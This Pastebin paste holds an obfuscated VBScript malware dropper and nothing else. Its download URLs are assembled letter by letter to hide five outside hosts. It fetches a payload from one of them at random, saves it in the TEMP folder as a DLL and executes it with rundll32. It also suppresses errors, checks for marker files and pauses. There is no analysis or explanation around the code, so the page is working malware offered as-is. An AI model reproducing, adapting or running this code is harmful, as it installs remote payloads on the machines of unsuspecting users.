Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- On Error Resume Next
- Const Kq2 = 1, Bl0 = 2, Ni = 8
- Const RFl1 = 1, Eb = 2, Wl4 = 2
- Const Fy = "437"
- Function RSb6(Tv3)
- Dim XSf(255), UYz, VEk8
- XSf(128)=199
- XSf(129)=252
- XSf(130)=233
- XSf(131)=226
- XSf(132)=228
- XSf(133)=224
- XSf(134)=229
- XSf(135)=231
- XSf(136)=234
- XSf(137)=235
- XSf(138)=232
- XSf(139)=239
- XSf(140)=238
- XSf(141)=236
- XSf(142)=196
- XSf(143)=197
- XSf(144)=201
- XSf(145)=230
- XSf(146)=198
- XSf(147)=244
- XSf(148)=246
- XSf(149)=242
- XSf(150)=251
- XSf(151)=249
- XSf(152)=255
- XSf(153)=214
- XSf(154)=220
- XSf(155)=162
- XSf(156)=163
- XSf(157)=165
- XSf(158)=8359
- XSf(159)=402
- XSf(160)=225
- XSf(161)=237
- XSf(162)=243
- XSf(163)=250
- XSf(164)=241
- XSf(165)=209
- XSf(166)=170
- XSf(167)=186
- XSf(168)=191
- XSf(169)=8976
- XSf(170)=172
- XSf(171)=189
- XSf(172)=188
- XSf(173)=161
- XSf(174)=171
- XSf(175)=187
- XSf(176)=9617
- XSf(177)=9618
- XSf(178)=9619
- XSf(179)=9474
- XSf(180)=9508
- XSf(181)=9569
- XSf(182)=9570
- XSf(183)=9558
- XSf(184)=9557
- XSf(185)=9571
- XSf(186)=9553
- XSf(187)=9559
- XSf(188)=9565
- XSf(189)=9564
- XSf(190)=9563
- XSf(191)=9488
- XSf(192)=9492
- XSf(193)=9524
- XSf(194)=9516
- XSf(195)=9500
- XSf(196)=9472
- XSf(197)=9532
- XSf(198)=9566
- XSf(199)=9567
- XSf(200)=9562
- XSf(201)=9556
- XSf(202)=9577
- XSf(203)=9574
- XSf(204)=9568
- XSf(205)=9552
- XSf(206)=9580
- XSf(207)=9575
- XSf(208)=9576
- XSf(209)=9572
- XSf(210)=9573
- XSf(211)=9561
- XSf(212)=9560
- XSf(213)=9554
- XSf(214)=9555
- XSf(215)=9579
- XSf(216)=9578
- XSf(217)=9496
- XSf(218)=9484
- XSf(219)=9608
- XSf(220)=9604
- XSf(221)=9612
- XSf(222)=9616
- XSf(223)=9600
- XSf(224)=945
- XSf(225)=223
- XSf(226)=915
- XSf(227)=960
- XSf(228)=931
- XSf(229)=963
- XSf(230)=181
- XSf(231)=964
- XSf(232)=934
- XSf(233)=920
- XSf(234)=937
- XSf(235)=948
- XSf(236)=8734
- XSf(237)=966
- XSf(238)=949
- XSf(239)=8745
- XSf(240)=8801
- XSf(241)=177
- XSf(242)=8805
- XSf(243)=8804
- XSf(244)=8992
- XSf(245)=8993
- XSf(246)=247
- XSf(247)=8776
- XSf(248)=176
- XSf(249)=8729
- XSf(250)=183
- XSf(251)=8730
- XSf(252)=8319
- XSf(253)=178
- XSf(254)=9632
- XSf(255)=160
- s = ""
- For VEk8 = 0 To UBound(Tv3)
- If Tv3(VEk8) < 0 Or Tv3(VEk8) > 255 Then
- Err.Raise 50003, "", "a2s()", "", 0
- ElseIf Tv3(VEk8) >= 128 Then
- UYz = UYz & ChrW(XSf(Tv3(VEk8)))
- Else
- UYz = UYz & ChrW(Tv3(VEk8))
- End If
- Next
- RSb6 = UYz
- End Function
- Function Nu3(OPb)
- Dim Xj, PTi, UYz
- Set Xj = CreateObject("ADODB.Stream")
- Xj.type = Eb
- Xj.Charset = Fy
- Xj.Open
- Xj.LoadFromFile OPb
- UYz = Xj.ReadText
- Xj.Close
- Nu3 = WFo3(UYz)
- End Function
- Sub So(OPb, Tv3)
- Dim Xj, UYz
- Set Xj = CreateObject("ADODB.Stream")
- Xj.type = Eb
- Xj.Charset = Fy
- Xj.Open
- UYz = RSb6(Tv3)
- Xj.WriteText UYz
- Xj.SaveToFile OPb, Wl4
- Xj.Close
- End Sub
- Function PKe(Iu7)
- Dim UYz, LVb(0)
- If Iu7 <= 0 Then
- Err.Raise 50001, "", "makearrr()", "", 0
- ElseIf Iu7 = 1 Then
- PKe = LVb
- Else
- UYz = Space(Iu7-1)
- PKe = Split(UYz, " ")
- End If
- End Function
- Function THv7(url)
- Dim HWy, IWu8, PTi, VEk8
- Dim Ze, BLm3(1)
- Set HWy = CreateObject("Scripting.FileSystemObject")
- BLm3(0) = "WinHttp.WinHttpRequest.5.1"
- BLm3(1) = "MSXML2.XMLHTTP"
- For Each Ze in BLm3
- Err.Clear
- Set IWu8 = CreateObject(Ze)
- If Err.Number = 0 Then
- Exit For
- End If
- Next
- IWu8.Open "GET", url, False
- IWu8.Send
- PTi = PKe(LenB(IWu8.ResponseBody))
- For VEk8 = 1 To LenB(IWu8.ResponseBody)
- PTi(VEk8-1) = AscB(MidB(IWu8.ResponseBody, VEk8, 1))
- Next
- THv7 = PTi
- End Function
- Function Re1()
- Dim IRj, Ji, UUr5
- Set IRj = CreateObject("WScript.Shell")
- Set Ji = IRj.Environment("System")
- UUr5 = Ji("PROCESSOR_ARCHITECTURE")
- If LCase(UUr5) = "amd64" Then
- Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
- Else
- Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
- End If
- End Function
- Sub LBd(Ix, Lw1, Ut)
- Dim IRj, HWy, Mm, MOd4, KNf
- Set IRj = CreateObject("WScript.Shell")
- Set HWy = CreateObject("Scripting.FileSystemObject")
- Set Mm = HWy.GetFile(Ix)
- MOd4 = Mm.ShortPath
- KNf = Re1() + " " + MOd4 + "," + Lw1 + " " + Ut
- If 2 > 1 Then
- IRj.Run(KNf)
- End If
- End Sub
- Function Ty(Ix)
- Dim HWy
- Set HWy = CreateObject("Scripting.FileSystemObject")
- Ty = HWy.FileExists(Ix)
- End Function
- Function Ex6(Ix)
- Dim HWy, Mm
- Set HWy = CreateObject("Scripting.FileSystemObject")
- Set Mm = HWy.GetFile(Ix)
- Ex6 = Mm.ShortPath
- End Function
- Function BWg(KQg2, Rd0)
- Dim Iu7
- Iu7 = CDbl(Int(CDbl(KQg2)/CDbl(Rd0)))
- BWg = CDbl(KQg2) - Iu7 * CDbl(Rd0)
- End Function
- Function Vu(BBa, UYz)
- UYz(1) = 172 * UYz(1) Mod 30307
- UYz(0) = 171 * UYz(0) Mod 30269
- UYz(2) = 170 * UYz(2) Mod 30323
- Dim Xf3
- Xf3 = BWg((CDbl(UYz(0))/30269.0 + CDbl(UYz(1))/30307.0 + CDbl(UYz(2))/30323.0), 1.0)
- Vu = Int(Xf3 * CDbl(BBa))
- End Function
- Function Kx(PTi, RBu)
- Dim PIq5(2), Pj1, Zi, Ya2, VEk8
- If UBound(PTi) < 3 Then
- Err.Raise 50004, "", "size of array muzt be >= 4", "", 0
- End If
- Pj1 = PKe(UBound(PTi) - 3)
- PIq5(0) = RBu(0)
- PIq5(1) = RBu(1)
- PIq5(2) = RBu(2)
- For VEk8 = 0 To UBound(PTi)
- PTi(VEk8) = PTi(VEk8) Xor Vu(256, PIq5)
- Next
- Zi = PTi(UBound(PTi)-3)+(PTi(UBound(PTi)-2)*256)+(PTi(UBound(PTi)-1)*256*256)+(PTi(UBound(PTi))*256*256*256)
- Ya2 = VUf9
- For VEk8 = 0 To UBound(Pj1)
- Pj1(VEk8) = PTi(VEk8)
- Ya2 = (Ya2 + PTi(VEk8)) Mod 1000000000
- Next
- If Ya2 <> Zi Then
- Err.Raise 50005, "", "checksum error", "", 0
- End If
- Kx = Pj1
- End Function
- Function GEq(TOv6)
- GEq = CInt(TOv6*Rnd())
- End Function
- Sub Hx(Oi)
- WScript.Sleep(Oi)
- End Sub
- Randomize
- Dim WQa2(2), VUf9, VIb(4), OPb
- WQa2(0) = 6575
- WQa2(1) = 24677
- WQa2(2) = 15342
- VUf9 = 46
- If 1=1 Then
- VIb(0) = "http://" & "a" & "n" & "g" & "u" & "n" & "d" & "o" & "v" & "i" & "z" & "." & "c" & "o" & "m" & "/" & "l" & "h" & "k" & "9" & "6" & "w" & "x"
- End If
- If 1=1 Then
- VIb(1) = "http://" & "a" & "1" & "p" & "l" & "u" & "s" & "2" & "." & "d" & "e" & "/" & "l" & "j" & "w" & "x" & "w" & "6" & "v" & "h"
- End If
- If 1=1 Then
- VIb(2) = "http://" & "e" & "n" & "z" & "y" & "m" & "a" & "." & "e" & "s" & "/" & "l" & "p" & "z" & "d" & "1" & "g" & "e" & "v"
- End If
- If 1=1 Then
- VIb(3) = "http://" & "z" & "l" & "o" & "t" & "y" & "s" & "a" & "l" & "m" & "o" & "." & "n" & "e" & "t" & "/" & "0" & "z" & "x" & "0" & "k" & "e" & "n" & "3"
- End If
- If 1=1 Then
- VIb(4) = "http://" & "a" & "o" & "t" & "e" & "a" & "t" & "r" & "i" & "a" & "l" & "." & "n" & "e" & "t" & "/" & "1" & "4" & "2" & "y" & "5" & "x"
- End If
- OPb = "vJlvsuTTmqgiF"
- Dim IRj, Lv, Ov6, Wg
- Set objShell = CreateObject("WScript.Shell")
- Lv = objShell.ExpandEnvironmentStrings("%" & "TEMP%")
- Dim Ag, AKw8, Ab7, Hk, VEk8
- AKw8 = False
- For VEk8=0 To 10: Do
- Ov6 = Lv + "\" + OPb + CStr(VEk8) + ".dll"
- If Ty(Ov6) Then
- Wg = Ex6(Ov6) & ".txt"
- If Ty(Wg) Then
- WScript.Quit(0)
- End If
- End If
- If Not AKw8 Then
- Ag = GEq(UBound(VIb))
- Ab7 = THv7(VIb(Ag))
- If Err.Number <> 0 Then
- Exit Do
- End If
- Hk = Ab7 ' Kx(Ab7, WQa2)
- If Err.Number <> 0 Then
- Exit Do
- End If
- So Ov6, Hk
- If Err.Number <> 0 Then
- Exit Do
- End If
- AKw8 = True
- End If
- LBd Ov6, "E"&"nhancedStoragePasswordConfig", "147"
- Hx 24899
- Loop While False: Next
- If 3=3 Then
- WScript.Quit(1)
- End If
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement